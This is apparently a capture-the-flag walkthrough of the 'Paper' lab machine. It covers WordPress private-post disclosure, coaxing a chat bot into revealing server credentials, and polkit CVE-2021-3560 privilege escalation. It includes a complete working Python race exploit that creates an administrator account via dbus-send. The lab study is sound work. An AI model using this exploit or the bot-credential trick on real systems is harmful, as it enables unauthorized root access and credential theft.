Step1: We start with reconnaissance. A port scan with nmap shows that ports 22, 80 and 443 are open.
data:image/s3,"s3://crabby-images/f813c/f813cb2775be3e94c2f18c246f694d3488ae23ad" alt=""
Opening the site in a browser only shows the default Apache page; there is no login form or anything else of use.
data:image/s3,"s3://crabby-images/6aede/6aede75d2d0b2d345e477f641e7ae9e859e98699" alt=""
Step2: With Burp Suite we intercept the request and notice a second hostname, office.paper, in the server's response. We add it to /etc/hosts and reach a different site.
data:image/s3,"s3://crabby-images/bc091/bc091157f59ff73ac3505e8a121617bf75d8da2f" alt=""
data:image/s3,"s3://crabby-images/92c92/92c92f94b3e4d6a2168cb05530d90fa8c1902bcc" alt=""
Step3: A hidden-directory scan with gobuster and a SecLists wordlist turns up a WordPress login page.
data:image/s3,"s3://crabby-images/3a8b2/3a8b24721c1e772bcaa4325c0bbc71027456465a" alt=""
data:image/s3,"s3://crabby-images/ce267/ce2671f2b27e69a9e4d1be14f256fca67ebca910" alt=""
Since the site runs WordPress, we search searchsploit for the installed version and find an entry named "WordPress 5.2.3 - Viewing Unauthenticated/Password/Private Posts". Reading the downloaded exploit gives us the payload. Note that this is not a command injection: it is an information-disclosure bug in which a single query-string parameter, `?static=1`, makes WordPress render draft and private posts to an unauthenticated visitor.
data:image/s3,"s3://crabby-images/f3aa9/f3aa966448d932dd0fed7d4efcc550b4c10b52f1" alt=""
Appending the payload to the site URL returns a page with content that was never meant to be public.
data:image/s3,"s3://crabby-images/62ff8/62ff852c6790d5fc722f0bcfa37124303b1651c9" alt=""
The hidden post contains a secret registration URL for the employee chat system at chat.office.paper. We add this hostname to /etc/hosts as well.
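The check behind Step3, as an added example that is not part of the original writeup: it reads the version WordPress advertises in its meta generator tag, compares it against the 5.2.4 fix for the private-post disclosure, and builds the `?static=1` URL while preserving any existing query string. The HTML and the office.paper URLs below are constructed inputs.

```python
#!/usr/bin/env python3
"""Offline triage for the WordPress <= 5.2.3 private-post disclosure (EDB 47690).

Added example, not code from the writeup. SAMPLE_HTML is constructed and
the site URLs used in the checks are hypothetical.
"""
import re
from urllib.parse import parse_qsl, urlencode, urlsplit, urlunsplit

# WordPress 5.2.4 fixed the bug in the 5.2 branch. The fix was also backported
# to older branches (5.1.3, 5.0.7, ...), so this comparison is only reliable
# for 5.2.x installs; anything else needs confirming by actually requesting
# the page and looking for a post that is not otherwise visible.
FIXED_IN = (5, 2, 4)

# Constructed sample of the generator tag WordPress emits by default.
SAMPLE_HTML = """<html><head>
<meta name="generator" content="WordPress 5.2.3" />
<title>Sample site</title></head><body></body></html>"""


def generator_version(html: str):
    """Return the version advertised by the meta generator tag, or None."""
    m = re.search(r'<meta\s+name="generator"\s+content="WordPress\s+([\d.]+)"',
                  html, re.IGNORECASE)
    if not m:
        return None
    return tuple(int(part) for part in m.group(1).strip(".").split("."))


def affected(version) -> bool:
    """True when the advertised version predates the 5.2.4 fix."""
    return version is not None and version < FIXED_IN


def static_posts_url(base_url: str) -> str:
    """Append static=1 to the front-page URL, keeping existing parameters."""
    parts = urlsplit(base_url)
    query = dict(parse_qsl(parts.query))
    query["static"] = "1"
    return urlunsplit((parts.scheme, parts.netloc, parts.path or "/",
                       urlencode(query), parts.fragment))


if __name__ == "__main__":
    version = generator_version(SAMPLE_HTML)
    print("advertised version:", version, "affected:", affected(version))
    print("request:", static_posts_url("http://office.paper/"))
```

A site can strip the generator tag, so a missing tag means "unknown", not "patched"; the request itself is the real test.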
Step4: The login page looks like this. We register a throwaway account through the secret URL and log in. Inside is a general channel where a few company employees, along with their chat bot, have had some revealing conversations.
data:image/s3,"s3://crabby-images/bb62a/bb62af343a706ce2f37cdf6b59ed1ac4bd033254" alt=""
data:image/s3,"s3://crabby-images/190c2/190c2381def27d5578bca97728ab8e0388c9f5f1" alt=""
Next we ask the chat bot to fetch data from the server for us; among what it returns is a set of credentials.
data:image/s3,"s3://crabby-images/6067c/6067c0499cfd7be8ab50bddd5c9683f7ef587467" alt=""
data:image/s3,"s3://crabby-images/bd6cc/bd6cc52463cda8dcbdfee01b702d6febf6036a08" alt=""
data:image/s3,"s3://crabby-images/4cb95/4cb95efdc540d9dcaa170ea690e8fb1c519cb733" alt=""
Step5: With credentials in hand, we try them over SSH on port 22.
data:image/s3,"s3://crabby-images/75cc2/75cc26bdbc5e3ab0dbb4e4ea1ac6466d2b900c6a" alt=""
Trouble: the username recyclops does not work. recyclops is the bot, so we retry with dwight, the user who developed it.
data:image/s3,"s3://crabby-images/e2211/e22111c4866ffeecd64d3365fefc78d1eeaf2e95" alt=""
That gets us a shell, and with it the user flag.
Step6: For privilege escalation we run linpeas.sh to enumerate the host. It flags the polkit vulnerability CVE-2021-3560.
data:image/s3,"s3://crabby-images/8e144/8e144b0397d07d5786b39bde19050ea3aa229bfc" alt=""
A quick search on GitHub turns up exploit code for that CVE.
data:image/s3,"s3://crabby-images/385b2/385b27f78b1f6cebd04a438741be70e53ad9ea1e" alt=""
Step7: We clone the exploit, copy its code into a file named poc.py on the target, make it executable and run it. For it to work, fill in the username and password the exploit should create, as shown in the figure.
data:image/s3,"s3://crabby-images/f6f07/f6f07ec5bbbe7528dcafa65c15492622af3eac1c" alt=""
Once the exploit has created the new user, we switch to it and run sudo bash.
Jackpot: we are root. Moving to the root directory and listing it gives us the root flag.
data:image/s3,"s3://crabby-images/32d38/32d380ea6e06537a07158ef6a3b50b0b18e31430" alt=""
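What the Step6 and Step7 exploit actually does, as an added example that is not the GitHub PoC the writeup used: the account-creation request is sent over D-Bus and killed a few milliseconds later, so polkit looks up a caller that no longer exists, mistakes it for uid 0 and lets the privileged action through. The block also triages the polkit version first. It assumes a host running accounts-daemon and polkit over the system bus; the username, full name and password hash passed to `exploit()` are placeholders you supply.

```python
#!/usr/bin/env python3
"""CVE-2021-3560 (polkit) helpers: version triage plus the dbus-send race.

Added example, not the PoC from the writeup. Assumes a D-Bus host running
accounts-daemon and polkit; the account details handed to exploit() are
hypothetical and must be chosen by the operator.
"""
import re
import subprocess
import time

# Upstream: the bug entered polkit in 0.113 and was fixed in 0.119.
FIRST_VULNERABLE = (0, 113)
FIRST_FIXED = (0, 119)


def parse_polkit_version(text: str):
    """Extract (major, minor) from `pkaction --version` output, e.g. 'pkaction version 0.115'."""
    m = re.search(r"(\d+)\.(\d+)", text)
    return (int(m.group(1)), int(m.group(2))) if m else None


def upstream_vulnerable(version) -> bool:
    """Range check against upstream numbers only. Distributions backport the
    fix without bumping the version, so confirm with the vendor changelog."""
    return version is not None and FIRST_VULNERABLE <= version < FIRST_FIXED


def create_user_cmd(username: str, full_name: str) -> list:
    """dbus-send call for org.freedesktop.Accounts.CreateUser.
    The trailing int32:1 asks for an administrator account (wheel/sudo group)."""
    return ["dbus-send", "--system", "--dest=org.freedesktop.Accounts",
            "--type=method_call", "--print-reply", "/org/freedesktop/Accounts",
            "org.freedesktop.Accounts.CreateUser",
            f"string:{username}", f"string:{full_name}", "int32:1"]


def set_password_cmd(uid: int, password_hash: str, hint: str = "") -> list:
    """dbus-send call for org.freedesktop.Accounts.User.SetPassword on User<uid>.
    password_hash is a crypt(3) hash, e.g. the output of `openssl passwd -6`."""
    return ["dbus-send", "--system", "--dest=org.freedesktop.Accounts",
            "--type=method_call", "--print-reply",
            f"/org/freedesktop/Accounts/User{uid}",
            "org.freedesktop.Accounts.User.SetPassword",
            f"string:{password_hash}", f"string:{hint}"]


def user_exists(username: str) -> bool:
    """Cheap success check for the CreateUser race."""
    return subprocess.run(["id", "-u", username], capture_output=True).returncode == 0


def race(cmd: list, delay_s: float, attempts: int, done=None) -> bool:
    """Start cmd and kill it after delay_s so the caller vanishes while polkit is
    still checking authorization. The right delay is host-specific; values
    around 5-15 ms are the usual starting point. Stops early once done() holds."""
    for _ in range(attempts):
        proc = subprocess.Popen(cmd, stdout=subprocess.DEVNULL, stderr=subprocess.DEVNULL)
        time.sleep(delay_s)
        proc.kill()
        proc.wait()
        if done is not None and done():
            return True
    return done is None


def exploit(username: str, full_name: str, password_hash: str,
            delay_s: float = 0.008, attempts: int = 200):
    """Create an admin user, then set its password; returns the new uid or None."""
    if not race(create_user_cmd(username, full_name), delay_s, attempts,
                done=lambda: user_exists(username)):
        return None
    uid = int(subprocess.check_output(["id", "-u", username]).strip())
    # No unprivileged way to verify the password took; just spray the request.
    race(set_password_cmd(uid, password_hash), delay_s, attempts)
    return uid


if __name__ == "__main__":
    out = subprocess.run(["pkaction", "--version"], capture_output=True, text=True).stdout
    version = parse_polkit_version(out)
    print("polkit", version, "upstream-vulnerable:", upstream_vulnerable(version))
```

After a successful run, `su <username>` with the chosen password followed by `sudo bash` gives the root shell described in Step7. If `id -u` never succeeds, adjust `delay_s` rather than raising `attempts`; the window is a timing one, not a probability one.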
Pwned!